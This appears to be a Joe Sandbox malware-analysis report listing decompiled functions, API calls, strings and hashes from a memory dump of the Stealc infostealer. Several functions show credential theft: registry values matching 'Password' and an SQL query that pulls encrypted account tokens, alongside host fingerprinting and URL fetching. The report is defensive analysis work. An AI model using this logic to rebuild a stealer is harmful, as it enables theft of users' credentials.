Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: sj$sj$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-1829183765
Opcode ID: 91e9b07a129ffd5575cec34be90f79eaa724859b6cf4c669992a14bd32bf1869
Instruction ID: 3eb86167ab5250bcfd1b6c34a964c8d3ea9ffd57073019e63159e5e38fa1cf47
Opcode Fuzzy Hash: 91e9b07a129ffd5575cec34be90f79eaa724859b6cf4c669992a14bd32bf1869
Instruction Fuzzy Hash: 2A519FB0D042089FDB64FB90CC45BEEB7B6AF05304F1440ADE215A3281EB746E88CF59

Function 006975D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006972D0: memset.MSVCRT ref: 00697314
Part of subcall function 006972D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00697C90), ref: 0069733A
Part of subcall function 006972D0: RegEnumValueA.ADVAPI32(00697C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006973B1
Part of subcall function 006972D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0069740D
Part of subcall function 006972D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00697C90,80000001,006A61C4,?,?,?,?,?,00697C90,?), ref: 00697452
Part of subcall function 006972D0: HeapFree.KERNEL32(00000000,?,?,?,?,00697C90,80000001,006A61C4,?,?,?,?,?,00697C90,?), ref: 00697459

lstrcatA.KERNEL32(331CC020,006B17FC,00697C90,80000001,006A61C4,?,?,?,?,?,00697C90,?,?,006A61C4), ref: 00697606
lstrcatA.KERNEL32(331CC020,00000000,00000000), ref: 00697648
lstrcatA.KERNEL32(331CC020, : ), ref: 0069765A
lstrcatA.KERNEL32(331CC020,00000000,00000000,00000000), ref: 0069768F
lstrcatA.KERNEL32(331CC020,006B1804), ref: 006976A0
lstrcatA.KERNEL32(331CC020,00000000,00000000,00000000), ref: 006976D3
lstrcatA.KERNEL32(331CC020,006B1808), ref: 006976ED
task.LIBCPMTD ref: 006976FB

Strings

: , xrefs: 0069764E

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: e86910c87d3e4e3561a732e60c5809c7d9a101dfa9bc91dad3835dda331cbfa1
Instruction ID: c3123ef73875bd808befab46a7b5bbcd4a91817804b2a14e499f7fa7c41b3544
Opcode Fuzzy Hash: e86910c87d3e4e3561a732e60c5809c7d9a101dfa9bc91dad3835dda331cbfa1
Instruction Fuzzy Hash: 44316B71902109EFCF48EBB4EC99DFE737EBB55301F244219E502A72A0DA34E942DB55

Function 006972D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00697314
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00697C90), ref: 0069733A
RegEnumValueA.ADVAPI32(00697C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006973B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0069740D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00697C90,80000001,006A61C4,?,?,?,?,?,00697C90,?), ref: 00697452
HeapFree.KERNEL32(00000000,?,?,?,?,00697C90,80000001,006A61C4,?,?,?,?,?,00697C90,?), ref: 00697459

Part of subcall function 00699240: vsprintf_s.MSVCRT ref: 0069925B

task.LIBCPMTD ref: 00697555

Strings

Password, xrefs: 00697401

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: 3facc66a1ef2f3a78329732fcd0bfa094ca007aa8ae15cc9b6274b1a1bb313d5
Instruction ID: 93bc6b8df2eea709506bea50df9473216ba4b983cf589a9c7fc043bcb5afe6ff
Opcode Fuzzy Hash: 3facc66a1ef2f3a78329732fcd0bfa094ca007aa8ae15cc9b6274b1a1bb313d5
Instruction Fuzzy Hash: B76117B59141689BDB24DB50CC41BEAB7BDBF44300F0081E9E689A7641DB706BC9CFA5

Function 006A7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 006A7542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006A757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7603
HeapAlloc.KERNEL32(00000000), ref: 006A760A
wsprintfA.USER32 ref: 006A7640

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Strings

\, xrefs: 006A7560
C, xrefs: 006A754C
:, xrefs: 006A755C

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 9571fdd7e68b0aa8cf305ef38eada6cea9a3710d75b0f96c33d305cb4ce36268
Instruction ID: 177a12aed8075a267b66bc9cf05d56e328756d12afbc5f4915a56e98d314ffb8
Opcode Fuzzy Hash: 9571fdd7e68b0aa8cf305ef38eada6cea9a3710d75b0f96c33d305cb4ce36268
Instruction Fuzzy Hash: A84180B1D05248ABDB14EF94DC45BEEBBB9BF19700F100199F50A67280DB74AE44CFA5

Function 006A4780 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,00A104B8,?,00000104,?,00000104,?,00000104,?,00000104), ref: 006A47DB

Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 006A8E0B

lstrcatA.KERNEL32(?,00000000), ref: 006A4801
lstrcatA.KERNEL32(?,?), ref: 006A4820
lstrcatA.KERNEL32(?,?), ref: 006A4834
lstrcatA.KERNEL32(?,00A0A128), ref: 006A4847
lstrcatA.KERNEL32(?,?), ref: 006A485B
lstrcatA.KERNEL32(?,00A10B90), ref: 006A486F

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006A8D90: GetFileAttributesA.KERNEL32(00000000,?,006A0117,?,00000000,?,00000000,006B0DAB,006B0DAA), ref: 006A8D9F

Part of subcall function 006A4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006A4580
Part of subcall function 006A4570: HeapAlloc.KERNEL32(00000000), ref: 006A4587
Part of subcall function 006A4570: wsprintfA.USER32 ref: 006A45A6
Part of subcall function 006A4570: FindFirstFileA.KERNEL32(?,?), ref: 006A45BD

Strings

0aj, xrefs: 006A48F9, 006A48A1, 006A48A4

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID: 0aj
API String ID: 167551676-179039778
Opcode ID: 87ab01ad07ea82cec4e425bb6d0c6c1a7172e54874daad684938ef25c2e117b9
Instruction ID: 3d280ff7fd9180266fe08f2ed242d1c97ce89f9ac49564f189284b726d08dbf8
Opcode Fuzzy Hash: 87ab01ad07ea82cec4e425bb6d0c6c1a7172e54874daad684938ef25c2e117b9
Instruction Fuzzy Hash: 17317FB2D00208ABCB54FBB0DC85EEA737DBB49700F40459DB71996091EE749B89CF99

Function 006A8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00A10260,00000000,?,006B0E2C,00000000,?,00000000), ref: 006A8130
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00A10260,00000000,?,006B0E2C,00000000,?,00000000,00000000), ref: 006A8137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 006A8158
__aulldiv.LIBCMT ref: 006A8172
__aulldiv.LIBCMT ref: 006A8180
wsprintfA.USER32 ref: 006A81AC

Strings

%d MB, xrefs: 006A81A3
@, xrefs: 006A814D

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: 4fb6d7e0ecec8312623218b8156bb20cfcde37c7bbc9818019c2e6b306fdf88d
Instruction ID: 605e15297609a5c875208ad69b228240cc208edcc15799d1bdc6d0a37641974b
Opcode Fuzzy Hash: 4fb6d7e0ecec8312623218b8156bb20cfcde37c7bbc9818019c2e6b306fdf88d
Instruction Fuzzy Hash: 7E213EB1E44218ABDB04DFD4CC49FAEB7B9FB45700F204619F605BB280D77859018BA5

Function 0069BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 00699E10: memcmp.MSVCRT(?,v20,00000003), ref: 00699E2D

lstrlenA.KERNEL32(00000000), ref: 0069BC9F

Part of subcall function 006A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006A8E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0069BCCD
lstrlenA.KERNEL32(00000000), ref: 0069BDA5
lstrlenA.KERNEL32(00000000), ref: 0069BDB9

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 0069BBEB
AccountTokens, xrefs: 0069BABA
AccountId, xrefs: 0069BCC4
AccountTokens, xrefs: 0069BB49

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 1440504306-1079375795
Opcode ID: 98d17cfb30214d41880279205e050d456346c044a3978bb780d91b519365cf63
Instruction ID: 13d796a7082a902013f333db9c996eac5a23beed4dcd89c577630b7529505946
Opcode Fuzzy Hash: 98d17cfb30214d41880279205e050d456346c044a3978bb780d91b519365cf63
Instruction Fuzzy Hash: 03B11B71910108ABDB84FBE0DD96EEE737AAF15300F50415EF506A6092EF34AE49CF66

Function 00694FB0 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00694FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00694FD1
InternetOpenA.WININET(006B0DDF,00000000,00000000,00000000,00000000), ref: 00694FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00695011
InternetReadFile.WININET(006A5EDB,?,00000400,00000000), ref: 00695041
memcpy.MSVCRT(00000000,?,00000001), ref: 0069508A
InternetCloseHandle.WININET(006A5EDB), ref: 006950B9
InternetCloseHandle.WININET(?), ref: 006950C6

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
String ID:
API String ID: 1008454911-0
Opcode ID: 2b0b1b64da37334bf7509025dfeaf37e29c85dd33f8ae4cc39cecdaafcc4e1e8
Instruction ID: 59e9775697b9ba459187e1eb44f950b9ef380213c1d017f515cf8d08788a8467
Opcode Fuzzy Hash: 2b0b1b64da37334bf7509025dfeaf37e29c85dd33f8ae4cc39cecdaafcc4e1e8
